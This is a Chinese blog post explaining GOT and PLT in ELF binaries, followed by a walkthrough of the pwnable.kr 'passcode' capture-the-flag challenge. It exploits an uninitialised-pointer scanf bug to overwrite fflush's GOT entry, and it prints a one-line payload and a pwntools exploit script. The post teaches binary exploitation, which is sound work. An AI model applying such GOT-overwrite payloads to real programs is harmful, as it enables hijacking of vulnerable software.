GOT 覆写技术浅析与实际应用

2024-01-22 21:48

本文主要是介绍GOT 覆写技术浅析与实际应用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x10 前置知识

0x11 GOT与PLT基本概念

GOT(Global Offset Table),即全局偏移表,存放的是每一个外部符号的地址。我们知道,对于动态链接,程序只有在运行的时候,才会链接到外部的函数库或者变量,而GOT的作用就在于,为每个程序找到他们链接的外部符号的地址。GOT 位于数据段(.data)中,一般将其单独称为.got 段。

专业术语:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到相应的符号,并将它重定位到GOT之后每次调用这个函数都会将控制权直接转向那个位置,而不再调用rtld。

PLT(Procedure Linkable Table),即程序链接表/过程链接表,存放的是每一个函数在GOT中的地址。从宏观角度来看,程序找到一个外部函数的重定向地址,首先是从PLT中找到其存储在GOT中的条目,再从GOT中找到函数真正的入口地址。从微观角度来说,真实的过程比这更为复杂。

函数和变量作为符号被存在可执行文件中, 不同类型的符号又聚合在一起, 称为符号表

0x12 GOT与PLT的区别

如果你用IDA反编译一个ELF或者PE格式的文件,会发现包含有got的段,有两个:.got和.got.plt。当然你也会发现包含有plt的段也有两个:.plt和.plt.got

  • .got 存放的是变量,这是链接器在执行链接时,实际上要填充的部分,保存了所有外部符号的地址信息,一般我们只认为其存放的时外部变量。
  • .got.plt 相当于.plt的GOT全局偏移表,你可以简单理解成,它存放的就是外部函数的入口地址。也就是说,如果我们将这个函数的地址改成另外一个函数的地址,当程序调用该函数时,实际上会调用到另外一个函数。 这是本篇博文的重点。
  • .plt 包含了一些代码,用来(1)调用链接器来解析某个外部函数的地址,并且填充到.got.plt中,然后跳转到该函数;(2)直接在.got.plt中查找该外部函数的地址,前提是已经填充过。

我们在IDA中,使用 ctrl+s 快捷键,就可以看到当前elf文件中含有的所有段。
在这里插入图片描述

0x20 GOT覆写

0x21 题目初勘

我们以pwnable上的一道题目为例,来讲解如何进行GOT的覆写。网址:http://pwnable.kr/play.php。题目名称:passcode。
在这里插入图片描述
使用远程连接,就可以看到该题目的信息。程序提示我们要输入密码,但我们并不能提前知晓密码,因此需要将该文件下载下来,进行反编译,查找漏洞。输入以下命令,可以拷贝远程服务器的目标文件。

 scp -P 2222 passcode@pwnable.kr:/home/passcode/passcode /root/Documents/

先简单运行一下程序,检查其功能。
在这里插入图片描述
题目较为简单,就是先输入用户名,再输入密码,模拟登录。实际情况是,我们输入第二次密码后,出现了 segmentation fault,进一步说明程序有漏洞,需要利用这个漏洞,绕开密码,从而成功登录。使用IDA对其进行反汇编,看到有关键函数login
在这里插入图片描述
也就是说,我们最终的目的是要让程序走到红色箭头分支,这样才能够执行 /bin/cat flag,打印出flag。

0x22 漏洞分析

可以将服务器端的源代码拷贝到本地机器上,也可以使用IDA的插件F5反编译,为了节省时间,我们直接查看源代码。
在这里插入图片描述
很明显,line 9 和 line 14的scanf的第二个参数没有加取地址符&,这会导致程序严重出错,带来意想不到的后果。正常来说,对于

scanf("%d", &passcode1)

用户的输入会直接存放到变量passcode1中,但是现在少了&,用户输入的数字会存放到passcode1未初始化时存放的内容作为地址,指向的存储单元。 接下来,我们就要搞清楚,这个passcode1未初始化时,到底存放的是什么。

0x23 动态调试

使用带有peda或者其他插件的gdb,对程序进行动态调试。在关键函数的入口出,设置断点。

运行到welcome()函数时,如下
在这里插入图片描述
运行到login()函数时,如下
在这里插入图片描述
也就是说,welcome和login用的是同一个栈空间!而welcome中,有我们输入的变量name,login中,有我们输入的变量passcode(由于源代码编写错误,实际存放passcode指向的地址)。而由于我们先在栈中存入了name的值,name由我们自己控制,而第二次调用welcome函数的时候,本来写入栈的变量,由于程序错误,实际写入了以该变量为地址的存储单元。 相信大家看到下图,就能够明白了。
在这里插入图片描述
至于-70h、-10h、-ch,是各个变量的偏移,利用IDA就能看出来了。所以,在第一次输入name的时候,使其填充(70h-10h)个字节,再加上一个任意地址,那么第二次输入passcode1的时候,输入的值就会存放到我们第一次输入的那个任意地址指向的存储单元,这就达到了任意地址写。

0x24 GOT 覆写

由于我们已经获得了任意地址写,现在只需要知道got表存放的相关条目的地址,就可以改写got。回到我们的passcode代码中,ctrl + s 选择 .got.plt 段(等同于使用readelf和objdump命令:readelf -r target_elf
objdump -R target_elf)
在这里插入图片描述
因为welcome后面还能继续加载printf、fflush等函数,所以只需要将后面会运行的任意一个函数的入口地址改位system函数的地址即可。当然,这里我们需要的是一个带参数的system的地址,即login中的system函数
在这里插入图片描述
最终,输入的利用代码如下

python -c 'print "a"*96 + "\x00\xa0\x04\x08" + "134514147\n"' | ./passcode

当然也可以编写exploit脚本

from pwn import *target = process('/home/passcode/passcode')
fflush_got = 0x0804a004
system_addr = 0x80485e3
payload = "A" * 96 + p32(fflush_got) + str(system_addr)
target.send(payload)
target.interactive()

运行结果如下
在这里插入图片描述

0x30 总结

本文首先简要介绍了GOT和PLT的基本概念和区别,然后以一个实际的例子讲述从任意地址写,到GOT的覆写,最后给出了的漏洞利用代码。其实,GOT和PLT的原理还是较为复杂的,有兴趣的同学可以深究。

这篇关于GOT 覆写技术浅析与实际应用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/634340

相关文章

Python中re模块结合正则表达式的实际应用案例

《Python中re模块结合正则表达式的实际应用案例》Python中的re模块是用于处理正则表达式的强大工具,正则表达式是一种用来匹配字符串的模式,它可以在文本中搜索和匹配特定的字符串模式,这篇文章主... 目录前言re模块常用函数一、查看文本中是否包含 A 或 B 字符串二、替换多个关键词为统一格式三、提

Java MQTT实战应用

《JavaMQTT实战应用》本文详解MQTT协议,涵盖其发布/订阅机制、低功耗高效特性、三种服务质量等级(QoS0/1/2),以及客户端、代理、主题的核心概念,最后提供Linux部署教程、Sprin... 目录一、MQTT协议二、MQTT优点三、三种服务质量等级四、客户端、代理、主题1. 客户端(Clien

Qt如何实现文本编辑器光标高亮技术

《Qt如何实现文本编辑器光标高亮技术》这篇文章主要为大家详细介绍了Qt如何实现文本编辑器光标高亮技术,文中的示例代码讲解详细,具有一定的借鉴价值,有需要的小伙伴可以了解下... 目录实现代码函数作用概述代码详解 + 注释使用 QTextEdit 的高亮技术(重点)总结用到的关键技术点应用场景举例示例优化建议

浅析如何保证MySQL与Redis数据一致性

《浅析如何保证MySQL与Redis数据一致性》在互联网应用中,MySQL作为持久化存储引擎,Redis作为高性能缓存层,两者的组合能有效提升系统性能,下面我们来看看如何保证两者的数据一致性吧... 目录一、数据不一致性的根源1.1 典型不一致场景1.2 关键矛盾点二、一致性保障策略2.1 基础策略:更新数

CSS中的Static、Relative、Absolute、Fixed、Sticky的应用与详细对比

《CSS中的Static、Relative、Absolute、Fixed、Sticky的应用与详细对比》CSS中的position属性用于控制元素的定位方式,不同的定位方式会影响元素在页面中的布... css 中的 position 属性用于控制元素的定位方式,不同的定位方式会影响元素在页面中的布局和层叠关

SpringBoot3应用中集成和使用Spring Retry的实践记录

《SpringBoot3应用中集成和使用SpringRetry的实践记录》SpringRetry为SpringBoot3提供重试机制,支持注解和编程式两种方式,可配置重试策略与监听器,适用于临时性故... 目录1. 简介2. 环境准备3. 使用方式3.1 注解方式 基础使用自定义重试策略失败恢复机制注意事项

Java中的登录技术保姆级详细教程

《Java中的登录技术保姆级详细教程》:本文主要介绍Java中登录技术保姆级详细教程的相关资料,在Java中我们可以使用各种技术和框架来实现这些功能,文中通过代码介绍的非常详细,需要的朋友可以参考... 目录1.登录思路2.登录标记1.会话技术2.会话跟踪1.Cookie技术2.Session技术3.令牌技

Java 枚举的基本使用方法及实际使用场景

《Java枚举的基本使用方法及实际使用场景》枚举是Java中一种特殊的类,用于定义一组固定的常量,枚举类型提供了更好的类型安全性和可读性,适用于需要定义一组有限且固定的值的场景,本文给大家介绍Jav... 目录一、什么是枚举?二、枚举的基本使用方法定义枚举三、实际使用场景代替常量状态机四、更多用法1.实现接

Python使用Tkinter打造一个完整的桌面应用

《Python使用Tkinter打造一个完整的桌面应用》在Python生态中,Tkinter就像一把瑞士军刀,它没有花哨的特效,却能快速搭建出实用的图形界面,作为Python自带的标准库,无需安装即可... 目录一、界面搭建:像搭积木一样组合控件二、菜单系统:给应用装上“控制中枢”三、事件驱动:让界面“活”

如何确定哪些软件是Mac系统自带的? Mac系统内置应用查看技巧

《如何确定哪些软件是Mac系统自带的?Mac系统内置应用查看技巧》如何确定哪些软件是Mac系统自带的?mac系统中有很多自带的应用,想要看看哪些是系统自带,该怎么查看呢?下面我们就来看看Mac系统内... 在MAC电脑上,可以使用以下方法来确定哪些软件是系统自带的:1.应用程序文件夹打开应用程序文件夹